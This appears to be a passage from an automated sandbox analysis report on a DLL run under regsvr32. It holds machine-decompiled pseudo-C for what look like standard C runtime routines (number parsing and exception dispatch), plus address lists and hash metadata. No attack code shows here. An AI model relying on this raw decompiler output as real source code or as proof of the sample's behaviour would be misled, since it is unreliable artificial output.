                                                                      				goto 0x8002c97e;
                                                                      				if (_t190 - (_t190 & 0x0000ffff) - r10d < 0) goto 0x8002c983;
                                                                      				if (_t190 - _a16 >= 0) goto 0x8002c877;
                                                                      				goto 0x8002c97e;
                                                                      				if (_t190 - _v152 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v148 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v144 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v140 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v136 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v132 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v128 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v124 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v120 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v116 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v112 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v108 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v104 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v100 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v96 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v92 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v88 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v84 < 0) goto 0x8002c7c8;
                                                                      				if (_t190 - _v80 < 0) goto 0x8002c983;
                                                                      				if (_t190 - _v76 < 0) goto 0x8002c7c8;
                                                                      				if ((_t190 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8002c983;
                                                                      				goto 0x8002c7c8;
                                                                      				if (_t190 - _v68 >= 0) goto 0x8002c983;
                                                                      				if ((_t190 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x8002c9a5;
                                                                      				_t64 = _t379 - 0x41; // 0x925
                                                                      				_t65 = _t379 - 0x61; // 0x905
                                                                      				_t152 = _t65;
                                                                      				if (_t64 - 0x19 <= 0) goto 0x8002c99a;
                                                                      				if (_t152 - 0x19 > 0) goto 0x8002ca1f;
                                                                      				if (_t152 - 0x19 > 0) goto 0x8002c9a2;
                                                                      				_t66 = _t379 - 0x37; // 0x84f
                                                                      				if (_t66 != 0) goto 0x8002ca1f;
                                                                      				_t380 =  *_t387;
                                                                      				r9d = 0xffdf;
                                                                      				_t241 =  *_t380 & 0x0000ffff;
                                                                      				_t67 =  &(_t380[1]); // 0xffe1
                                                                      				_t398 = _t67;
                                                                      				 *_t387 = _t398;
                                                                      				_t68 = _t383 - 0x58; // 0xfeb8
                                                                      				if ((r9w & _t68) == 0) goto 0x8002ca07;
                                                                      				 *_t387 = _t380;
                                                                      				_t156 =  !=  ? r15d : 8;
                                                                      				r15d =  !=  ? r15d : 8;
                                                                      				if (_t241 == 0) goto 0x8002c9ff;
                                                                      				if ( *_t380 == _t241) goto 0x8002c9ff;
                                                                      				E0000000118003BFFC( *_t380 - _t241, _t363);
                                                                      				 *_t363 = 0x16;
                                                                      				E0000000118003A794();
                                                                      				r8d = 0x660;
                                                                      				r11d = 0x6f0;
                                                                      				goto 0x8002ca2e;
                                                                      				r8d = 0x660;
                                                                      				goto 0x8002ca2e;
                                                                      				_t191 =  *_t398 & 0x0000ffff;
                                                                      				_t71 =  &(_t398[1]); // 0xffe3
                                                                      				_t364 = _t71;
                                                                      				 *_t387 = _t364;
                                                                      				r8d = 0x660;
                                                                      				goto 0x8002ca24;
                                                                      				_t161 =  !=  ? r15d : 0xa;
                                                                      				r15d = 0xa;
                                                                      				_t400 = r15d;
                                                                      				_t365 = _t364 | 0xffffffff;
                                                                      				r12d = 0x30;
                                                                      				_t73 = ( !=  ? r15d : 0xa) % _t400;
                                                                      				_t243 = ( !=  ? r15d : 0xa) % _t400;
                                                                      				r14d = 0xff10;
                                                                      				if (_t191 - r12w < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - 0x3a >= 0) goto 0x8002ca64;
                                                                      				goto 0x8002cbf6;
                                                                      				if (_t191 - r14w >= 0) goto 0x8002cbe6;
                                                                      				if (_t191 - r8w < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - 0x66a >= 0) goto 0x8002ca8d;
                                                                      				goto 0x8002cbf6;
                                                                      				if (_t191 - r11w < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - 0x6fa >= 0) goto 0x8002caac;
                                                                      				goto 0x8002cbf6;
                                                                      				if (_t191 - 0x966 < 0) goto 0x8002cbfb;
                                                                      				_t76 = _t365 + 0xa; // 0x970
                                                                      				if (_t191 - _t76 >= 0) goto 0x8002cacc;
                                                                      				goto 0x8002cbf6;
                                                                      				if (_t191 - 0x9e6 < 0) goto 0x8002cbfb;
                                                                      				_t77 = _t365 + 0xa; // 0x9f0
                                                                      				if (_t191 - _t77 < 0) goto 0x8002cac2;
                                                                      				_t78 =  &(_t380[0x3b]); // 0xa66
                                                                      				if (_t191 - _t78 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _a16 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v152 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v148 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v144 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v140 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v136 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v132 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v128 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v124 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v120 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v116 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v112 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v108 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v104 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v100 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v96 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v92 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v88 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v84 < 0) goto 0x8002cac2;
                                                                      				if (_t191 - _v80 < 0) goto 0x8002cbfb;
                                                                      				if (_t191 - _v76 < 0) goto 0x8002cac2;
                                                                      				if ((_t191 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8002cbfb;
                                                                      				goto 0x8002cbf6;
                                                                      				if (_t191 - _v68 >= 0) goto 0x8002cbfb;
                                                                      				if ((_t191 & 0x0000ffff) - r14d != 0xffffffff) goto 0x8002cc1e;
                                                                      				_t102 = _t380 - 0x41; // -65
                                                                      				_t103 = _t380 - 0x61; // -97
                                                                      				_t181 = _t103;
                                                                      				if (_t102 - 0x19 <= 0) goto 0x8002cc0e;
                                                                      				if (_t181 - 0x19 > 0) goto 0x8002cc1b;
                                                                      				if (_t181 - 0x19 > 0) goto 0x8002cc16;
                                                                      				goto 0x8002cc1e;
                                                                      				_t399 =  *_t387;
                                                                      				if (((_t191 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0x8002cc67;
                                                                      				_t192 =  *_t399 & 0x0000ffff;
                                                                      				_t367 = _t400 * _t390;
                                                                      				_t232 = r13d;
                                                                      				_t384 = _t383 + _t367;
                                                                      				_t344 = _t383 + _t367 - _t367;
                                                                      				_t182 = r13d;
                                                                      				_t345 = _t390 - (_t364 | 0xffffffff);
                                                                      				r8d = 0x660;
                                                                      				 *_t387 =  &(_t399[1]);
                                                                      				_t249 = ( !=  ? _t246 : _t246 | 0x00000002) | (_t232 & 0xffffff00 | _t344 > 0x00000000 | _t182 & 0xffffff00 | _t345 > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				goto 0x8002ca49;
                                                                      				_t405 = _a8;
                                                                      				_t369 = _t399 - 2;
                                                                      				_t403 = _v64;
                                                                      				 *_t387 = _t369;
                                                                      				if (_t192 == 0) goto 0x8002cc98;
                                                                      				if ( *_t369 == _t192) goto 0x8002cc98;
                                                                      				E0000000118003BFFC( *_t369 - _t192, _t369);
                                                                      				 *_t369 = 0x16;
                                                                      				E0000000118003A794();
                                                                      				if ((sil & 0x00000008) != 0) goto 0x8002ccb1;
                                                                      				_t370 = _t387[1];
                                                                      				 *_t387 = _t403;
                                                                      				if (_t370 == 0) goto 0x8002ccad;
                                                                      				 *_t370 = _t403;
                                                                      				goto 0x8002cd2b;
                                                                      				_t237 = ( !=  ? _t246 : _t246 | 0x00000002) | (_t232 & 0xffffff00 | _t344 > 0x00000000 | _t182 & 0xffffff00 | _t345 > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				_t187 = E0000000118002CD48(( !=  ? _t246 : _t246 | 0x00000002) | (_t232 & 0xffffff00 | _t344 > 0x00000000 | _t182 & 0xffffff00 | _t345 > 0x00000000) << 0x00000002 | 0x00000008, _t384);
                                                                      				if (_t187 == 0) goto 0x8002cd10;
                                                                      				 *((char*)(_t405 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t405 + 0x2c)) = 0x22;
                                                                      				if ((sil & 0x00000001) != 0) goto 0x8002ccd8;
                                                                      				goto 0x8002cd19;
                                                                      				_t381 = _t387[1];
                                                                      				if ((sil & 0x00000002) == 0) goto 0x8002ccf9;
                                                                      				if (_t381 == 0) goto 0x8002cced;
                                                                      				 *_t381 =  *_t387;
                                                                      				goto 0x8002cd2b;
                                                                      				if (_t381 == 0) goto 0x8002cd04;
                                                                      				 *_t381 =  *_t387;
                                                                      				goto 0x8002cd2b;
                                                                      				if ((sil & 0x00000002) == 0) goto 0x8002cd19;
                                                                      				_t386 = _t387[1];
                                                                      				if (_t386 == 0) goto 0x8002cd28;
                                                                      				 *_t386 =  *_t387;
                                                                      				return _t187;
                                                                      			}


































































                                                                      0x18002c5d0
                                                                      0x18002c5d0
                                                                      0x18002c5d0
                                                                      0x18002c5d5
                                                                      0x18002c5ec
                                                                      0x18002c5ef
                                                                      0x18002c5f2
                                                                      0x18002c5f6
                                                                      0x18002c5f9
                                                                      0x18002c601
                                                                      0x18002c607
                                                                      0x18002c609
                                                                      0x18002c60e
                                                                      0x18002c614
                                                                      0x18002c619
                                                                      0x18002c61e
                                                                      0x18002c627
                                                                      0x18002c629
                                                                      0x18002c62e
                                                                      0x18002c631
                                                                      0x18002c635
                                                                      0x18002c638
                                                                      0x18002c643
                                                                      0x18002c648
                                                                      0x18002c64d
                                                                      0x18002c654
                                                                      0x18002c65d
                                                                      0x18002c660
                                                                      0x18002c66f
                                                                      0x18002c672
                                                                      0x18002c679
                                                                      0x18002c67b
                                                                      0x18002c680
                                                                      0x18002c682
                                                                      0x18002c68c
                                                                      0x18002c69e
                                                                      0x18002c6ae
                                                                      0x18002c6b7
                                                                      0x18002c6b9
                                                                      0x18002c6bc
                                                                      0x18002c6bf
                                                                      0x18002c6c3
                                                                      0x18002c6c6
                                                                      0x18002c6d6
                                                                      0x18002c6e3
                                                                      0x18002c6f0
                                                                      0x18002c6f8
                                                                      0x18002c6fe
                                                                      0x18002c706
                                                                      0x18002c706
                                                                      0x18002c70a
                                                                      0x18002c712
                                                                      0x18002c718
                                                                      0x18002c720
                                                                      0x18002c726
                                                                      0x18002c72e
                                                                      0x18002c736
                                                                      0x18002c73e
                                                                      0x18002c746
                                                                      0x18002c74e
                                                                      0x18002c756
                                                                      0x18002c75e
                                                                      0x18002c766
                                                                      0x18002c76e
                                                                      0x18002c776
                                                                      0x18002c77e
                                                                      0x18002c786
                                                                      0x18002c78e
                                                                      0x18002c796
                                                                      0x18002c7a1
                                                                      0x18002c7b3
                                                                      0x18002c7bc
                                                                      0x18002c7c6
                                                                      0x18002c7cd
                                                                      0x18002c7d5
                                                                      0x18002c7df
                                                                      0x18002c7ed
                                                                      0x18002c7f5
                                                                      0x18002c7fe
                                                                      0x18002c80c
                                                                      0x18002c814
                                                                      0x18002c81d
                                                                      0x18002c82b
                                                                      0x18002c833
                                                                      0x18002c83c
                                                                      0x18002c84a
                                                                      0x18002c852
                                                                      0x18002c85a
                                                                      0x18002c868
                                                                      0x18002c872
                                                                      0x18002c87e
                                                                      0x18002c889
                                                                      0x18002c896
                                                                      0x18002c8a1
                                                                      0x18002c8ae
                                                                      0x18002c8b9
                                                                      0x18002c8c6
                                                                      0x18002c8d1
                                                                      0x18002c8de
                                                                      0x18002c8e9
                                                                      0x18002c8f6
                                                                      0x18002c901
                                                                      0x18002c90e
                                                                      0x18002c915
                                                                      0x18002c922
                                                                      0x18002c929
                                                                      0x18002c936
                                                                      0x18002c93d
                                                                      0x18002c94a
                                                                      0x18002c951
                                                                      0x18002c968
                                                                      0x18002c96a
                                                                      0x18002c977
                                                                      0x18002c981
                                                                      0x18002c986
                                                                      0x18002c98c
                                                                      0x18002c98c
                                                                      0x18002c98f
                                                                      0x18002c994
                                                                      0x18002c99d
                                                                      0x18002c9a2
                                                                      0x18002c9a7
                                                                      0x18002c9a9
                                                                      0x18002c9ac
                                                                      0x18002c9b2
                                                                      0x18002c9b5
                                                                      0x18002c9b5
                                                                      0x18002c9b9
                                                                      0x18002c9bc
                                                                      0x18002c9c3
                                                                      0x18002c9c8
                                                                      0x18002c9d0
                                                                      0x18002c9d4
                                                                      0x18002c9da
                                                                      0x18002c9df
                                                                      0x18002c9e1
                                                                      0x18002c9e6
                                                                      0x18002c9ec
                                                                      0x18002c9f1
                                                                      0x18002c9f7
                                                                      0x18002c9fd
                                                                      0x18002c9ff
                                                                      0x18002ca05
                                                                      0x18002ca07
                                                                      0x18002ca0b
                                                                      0x18002ca0b
                                                                      0x18002ca0f
                                                                      0x18002ca12
                                                                      0x18002ca1d
                                                                      0x18002ca27
                                                                      0x18002ca2b
                                                                      0x18002ca2e
                                                                      0x18002ca33
                                                                      0x18002ca37
                                                                      0x18002ca3d
                                                                      0x18002ca3d
                                                                      0x18002ca40
                                                                      0x18002ca4d
                                                                      0x18002ca57
                                                                      0x18002ca5f
                                                                      0x18002ca68
                                                                      0x18002ca72
                                                                      0x18002ca80
                                                                      0x18002ca88
                                                                      0x18002ca91
                                                                      0x18002ca9f
                                                                      0x18002caa7
                                                                      0x18002cab4
                                                                      0x18002caba
                                                                      0x18002cac0
                                                                      0x18002cac7
                                                                      0x18002cad4
                                                                      0x18002cada
                                                                      0x18002cae0
                                                                      0x18002cae2
                                                                      0x18002cae8
                                                                      0x18002caf6
                                                                      0x18002caff
                                                                      0x18002cb0a
                                                                      0x18002cb13
                                                                      0x18002cb1e
                                                                      0x18002cb27
                                                                      0x18002cb32
                                                                      0x18002cb3b
                                                                      0x18002cb46
                                                                      0x18002cb53
                                                                      0x18002cb5e
                                                                      0x18002cb6b
                                                                      0x18002cb76
                                                                      0x18002cb83
                                                                      0x18002cb8a
                                                                      0x18002cb97
                                                                      0x18002cb9e
                                                                      0x18002cbab
                                                                      0x18002cbb2
                                                                      0x18002cbbf
                                                                      0x18002cbc6
                                                                      0x18002cbdd
                                                                      0x18002cbe4
                                                                      0x18002cbee
                                                                      0x18002cbf9
                                                                      0x18002cbfe
                                                                      0x18002cc04
                                                                      0x18002cc04
                                                                      0x18002cc07
                                                                      0x18002cc0c
                                                                      0x18002cc11
                                                                      0x18002cc19
                                                                      0x18002cc1e
                                                                      0x18002cc24
                                                                      0x18002cc26
                                                                      0x18002cc2d
                                                                      0x18002cc33
                                                                      0x18002cc36
                                                                      0x18002cc39
                                                                      0x18002cc3c
                                                                      0x18002cc42
                                                                      0x18002cc54
                                                                      0x18002cc5d
                                                                      0x18002cc60
                                                                      0x18002cc62
                                                                      0x18002cc67
                                                                      0x18002cc6f
                                                                      0x18002cc73
                                                                      0x18002cc7b
                                                                      0x18002cc81
                                                                      0x18002cc86
                                                                      0x18002cc88
                                                                      0x18002cc8d
                                                                      0x18002cc93
                                                                      0x18002cc9c
                                                                      0x18002cc9e
                                                                      0x18002cca2
                                                                      0x18002cca8
                                                                      0x18002ccaa
                                                                      0x18002ccaf
                                                                      0x18002ccb4
                                                                      0x18002ccb6
                                                                      0x18002ccbd
                                                                      0x18002ccbf
                                                                      0x18002ccc4
                                                                      0x18002ccd0
                                                                      0x18002ccd6
                                                                      0x18002ccd8
                                                                      0x18002cce0
                                                                      0x18002cce5
                                                                      0x18002ccea
                                                                      0x18002ccf7
                                                                      0x18002ccfc
                                                                      0x18002cd01
                                                                      0x18002cd0e
                                                                      0x18002cd14
                                                                      0x18002cd19
                                                                      0x18002cd20
                                                                      0x18002cd25
                                                                      0x18002cd45

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: -$0$f$p$p
                                                                      • API String ID: 3215553584-1865143739
                                                                      • Opcode ID: 9aab83b027003c8085b13a3555ddcf0115b748eaf86f2e0300c93c15e51bc787
                                                                      • Instruction ID: 9a9bca4bc94187b01f71e4e243fdd007db5aae3dd8b67fadad36d113f8957ce5
                                                                      • Opcode Fuzzy Hash: 9aab83b027003c8085b13a3555ddcf0115b748eaf86f2e0300c93c15e51bc787
                                                                      • Instruction Fuzzy Hash: A312C57260414986FBA3AA15E048BEE7791F348BD4F98C116FAD547AC4DF38C788CB06
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E00000001180053BD0(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				signed int* _t127;
                                                                      				void* _t144;
                                                                      				intOrPtr _t145;
                                                                      				intOrPtr _t153;
                                                                      				void* _t172;
                                                                      				intOrPtr _t175;
                                                                      				signed int _t176;
                                                                      				signed int _t177;
                                                                      				void* _t179;
                                                                      				void* _t208;
                                                                      				signed long long _t218;
                                                                      				signed long long _t219;
                                                                      				signed long long _t225;
                                                                      				long long _t227;
                                                                      				intOrPtr _t234;
                                                                      				intOrPtr* _t235;
                                                                      				intOrPtr* _t236;
                                                                      				long long _t266;
                                                                      				signed int* _t279;
                                                                      				long long _t280;
                                                                      				void* _t281;
                                                                      				void* _t282;
                                                                      				signed long long _t283;
                                                                      				long long _t295;
                                                                      				signed int _t304;
                                                                      
                                                                      				_t179 = __esi;
                                                                      				_t281 = _t282 - 0x28;
                                                                      				_t283 = _t282 - 0x128;
                                                                      				_t218 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t219 = _t218 ^ _t283;
                                                                      				 *(_t281 + 0x10) = _t219;
                                                                      				_t279 =  *((intOrPtr*)(_t281 + 0x90));
                                                                      				_t304 =  *((intOrPtr*)(_t281 + 0xa8));
                                                                      				 *((long long*)(_t283 + 0x68)) = __r8;
                                                                      				_t235 = __rcx;
                                                                      				 *((long long*)(_t281 - 0x80)) = __rdx;
                                                                      				 *(_t281 - 0x68) = _t304;
                                                                      				 *((char*)(_t283 + 0x60)) = 0;
                                                                      				_t280 = __r9;
                                                                      				_t127 = E000000011800521F4(__ecx, __rcx, __rdx, __r9, __r9, _t281, _t279, __r9);
                                                                      				r14d = _t127;
                                                                      				if (_t127 - 0xffffffff < 0) goto 0x8005408f;
                                                                      				_t9 =  &(_t279[1]); // 0x8b4860246c8b4858
                                                                      				if (_t127 -  *_t9 >= 0) goto 0x8005408f;
                                                                      				if ( *_t235 != 0xe06d7363) goto 0x80053d1b;
                                                                      				if ( *((intOrPtr*)(_t235 + 0x18)) != 4) goto 0x80053d1b;
                                                                      				if ( *((intOrPtr*)(_t235 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80053d1b;
                                                                      				if ( *((long long*)(_t235 + 0x30)) != 0) goto 0x80053d1b;
                                                                      				E0000000118002DD20(_t219);
                                                                      				if ( *((long long*)(_t219 + 0x20)) == 0) goto 0x80054028;
                                                                      				E0000000118002DD20(_t219);
                                                                      				_t236 =  *((intOrPtr*)(_t219 + 0x20));
                                                                      				E0000000118002DD20(_t219);
                                                                      				 *((char*)(_t283 + 0x60)) = 1;
                                                                      				 *((long long*)(_t283 + 0x68)) =  *((intOrPtr*)(_t219 + 0x28));
                                                                      				E000000011800422C8(_t219,  *((intOrPtr*)(_t236 + 0x38)));
                                                                      				if ( *_t236 != 0xe06d7363) goto 0x80053cd3;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80053cd3;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80053cd3;
                                                                      				if ( *((long long*)(_t236 + 0x30)) == 0) goto 0x8005408f;
                                                                      				E0000000118002DD20(_t219);
                                                                      				if ( *(_t219 + 0x38) == 0) goto 0x80053d1b;
                                                                      				E0000000118002DD20(_t219);
                                                                      				E0000000118002DD20(_t219);
                                                                      				 *(_t219 + 0x38) =  *(_t219 + 0x38) & 0x00000000;
                                                                      				if (E00000001180052D6C(_t219, _t236, _t236,  *(_t219 + 0x38), __r9) != 0) goto 0x80053d16;
                                                                      				if (E00000001180052E5C(_t219, _t236,  *(_t219 + 0x38), __r9, _t281) == 0) goto 0x8005406c;
                                                                      				goto 0x80054048;
                                                                      				 *((long long*)(_t281 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                      				 *(_t281 - 0x48) = _t279;
                                                                      				if ( *_t236 != 0xe06d7363) goto 0x80053fdf;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80053fdf;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80053fdf;
                                                                      				r13d = 0;
                                                                      				if (_t279[3] - r13d <= 0) goto 0x80053f10;
                                                                      				 *(_t283 + 0x28) =  *(_t281 + 0xa0);
                                                                      				 *(_t283 + 0x20) = _t279;
                                                                      				r8d = r14d;
                                                                      				_t144 = E00000001180041E60(_t236, _t281 - 0x28, _t281 - 0x48, __r9, _t281, __r9, __r10);
                                                                      				asm("movups xmm0, [ebp-0x28]");
                                                                      				asm("movdqu [ebp-0x38], xmm0");
                                                                      				asm("psrldq xmm0, 0x8");
                                                                      				asm("movd eax, xmm0");
                                                                      				if (_t144 -  *((intOrPtr*)(_t281 - 0x10)) >= 0) goto 0x80053f10;
                                                                      				_t295 =  *((intOrPtr*)(_t281 - 0x28));
                                                                      				r12d =  *((intOrPtr*)(_t281 - 0x30));
                                                                      				 *((long long*)(_t283 + 0x78)) = _t295;
                                                                      				_t145 = r12d;
                                                                      				asm("inc ecx");
                                                                      				 *((intOrPtr*)(_t281 - 0x50)) = __ecx;
                                                                      				asm("movd eax, xmm0");
                                                                      				asm("movups [ebp-0x60], xmm0");
                                                                      				if (_t145 - r14d > 0) goto 0x80053eff;
                                                                      				_t225 =  *(_t281 - 0x60) >> 0x20;
                                                                      				if (r14d - _t145 > 0) goto 0x80053eff;
                                                                      				_t266 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t281 - 0x38)) + 0x10)) + ( *( *(_t281 - 0x38)) +  *( *(_t281 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t295 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                      				 *((long long*)(_t281 - 0x70)) = _t266;
                                                                      				if (r15d == 0) goto 0x80053efc;
                                                                      				asm("movups xmm0, [edx+ecx*4]");
                                                                      				asm("movups [ebp-0x8], xmm0");
                                                                      				 *((intOrPtr*)(_t281 + 8)) =  *((intOrPtr*)(_t266 + 0x10 + (_t225 + _t225 * 4) * 4));
                                                                      				E000000011800422B4(_t225);
                                                                      				_t227 = _t225 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc));
                                                                      				 *((long long*)(_t283 + 0x70)) = _t227;
                                                                      				E000000011800422B4(_t227);
                                                                      				_t175 =  *((intOrPtr*)(_t227 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc))));
                                                                      				 *((intOrPtr*)(_t283 + 0x64)) = _t175;
                                                                      				if (_t175 <= 0) goto 0x80053e8d;
                                                                      				E000000011800422B4(_t227);
                                                                      				 *((long long*)(_t281 - 0x78)) = _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70))));
                                                                      				if (E000000011800533B0(_t179, _t236, _t281 - 8, _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70)))), _t279, __r9,  *((intOrPtr*)(_t236 + 0x30))) != 0) goto 0x80053e9e;
                                                                      				 *((long long*)(_t283 + 0x70)) =  *((long long*)(_t283 + 0x70)) + 4;
                                                                      				_t153 =  *((intOrPtr*)(_t283 + 0x64)) - 1;
                                                                      				 *((intOrPtr*)(_t283 + 0x64)) = _t153;
                                                                      				if (_t153 > 0) goto 0x80053e51;
                                                                      				r13d = r13d + 1;
                                                                      				if (r13d == r15d) goto 0x80053ef7;
                                                                      				goto 0x80053e0a;
                                                                      				 *((char*)(_t283 + 0x58)) =  *((intOrPtr*)(_t281 + 0x98));
                                                                      				 *(_t283 + 0x50) =  *((intOrPtr*)(_t283 + 0x60));
                                                                      				 *((long long*)(_t283 + 0x48)) =  *(_t281 - 0x68);
                                                                      				 *(_t283 + 0x40) =  *(_t281 + 0xa0);
                                                                      				 *(_t283 + 0x38) = _t281 - 0x60;
                                                                      				 *(_t283 + 0x30) =  *((intOrPtr*)(_t281 - 0x78));
                                                                      				 *(_t283 + 0x28) = _t281 - 8;
                                                                      				 *(_t283 + 0x20) = _t279;
                                                                      				E00000001180054594(_t175, _t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *((intOrPtr*)(_t283 + 0x68)), _t280);
                                                                      				r13d = 0;
                                                                      				r12d = r12d + 1;
                                                                      				if (r12d -  *((intOrPtr*)(_t281 - 0x10)) < 0) goto 0x80053da5;
                                                                      				if (( *_t279 & 0x1fffffff) - 0x19930521 < 0) goto 0x8005401c;
                                                                      				_t208 = _t279[8] - r13d;
                                                                      				if (_t208 == 0) goto 0x80053f36;
                                                                      				E00000001180042288(_t281 - 8);
                                                                      				_t99 =  &(_t279[8]); // 0x4857207089481868
                                                                      				if (_t208 != 0) goto 0x80053f57;
                                                                      				_t100 =  &(_t279[9]); // 0x8360ec8348572070
                                                                      				if (( *_t100 >> 0x00000002 & 0x00000001) == 0) goto 0x8005401c;
                                                                      				if (E00000001180041C00( *_t100 >> 0x00000002 & 0x00000001, _t281 - 8 +  *_t99, _t280, _t279) != 0) goto 0x8005401c;
                                                                      				_t103 =  &(_t279[9]); // 0x8360ec8348572070
                                                                      				if (( *_t103 >> 0x00000002 & 0x00000001) != 0) goto 0x80054072;
                                                                      				if (_t279[8] == r13d) goto 0x80053f7c;
                                                                      				E00000001180042288(_t281 - 8 +  *_t99);
                                                                      				_t107 =  &(_t279[8]); // 0x4857207089481868
                                                                      				_t234 =  *_t107;
                                                                      				goto 0x80053f7f;
                                                                      				if (E00000001180052D6C(_t234, _t236, _t236, _t304, _t280) != 0) goto 0x8005401c;
                                                                      				E00000001180041C90(_t236,  *((intOrPtr*)(_t281 - 0x80)), _t280, _t281, _t279, _t281 - 0x78);
                                                                      				_t176 =  *((intOrPtr*)(_t281 + 0x98));
                                                                      				 *(_t283 + 0x50) = _t176;
                                                                      				_t177 = _t176 | 0xffffffff;
                                                                      				 *((long long*)(_t283 + 0x48)) = _t280;
                                                                      				 *(_t283 + 0x40) = _t304;
                                                                      				 *(_t283 + 0x38) = _t177;
                                                                      				 *(_t283 + 0x30) = _t177;
                                                                      				 *(_t283 + 0x28) = _t279;
                                                                      				 *(_t283 + 0x20) = _t304;
                                                                      				E00000001180041D5C( *((intOrPtr*)(_t281 - 0x80)), _t236,  *((intOrPtr*)(_t283 + 0x68)), _t234);
                                                                      				goto 0x8005401c;
                                                                      				if (_t279[3] <= 0) goto 0x8005401c;
                                                                      				if ( *((char*)(_t281 + 0x98)) != 0) goto 0x8005408f;
                                                                      				 *(_t283 + 0x38) = _t304;
                                                                      				 *(_t283 + 0x30) =  *(_t281 + 0xa0);
                                                                      				 *(_t283 + 0x28) = r14d;
                                                                      				 *(_t283 + 0x20) = _t279;
                                                                      				E00000001180054668(_t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *(_t281 - 0x58) >> 0x20, _t280);
                                                                      				_t172 = E0000000118002DD20(_t234);
                                                                      				if ( *((long long*)(_t234 + 0x38)) != 0) goto 0x8005408f;
                                                                      				return E00000001180002FB0(_t172, _t177,  *(_t281 + 0x10) ^ _t283);
                                                                      			}
































                                                                      0x180053bd0
                                                                      0x180053bdd
                                                                      0x180053be2
                                                                      0x180053be9
                                                                      0x180053bf0
                                                                      0x180053bf3
                                                                      0x180053bf7
                                                                      0x180053c01
                                                                      0x180053c0b
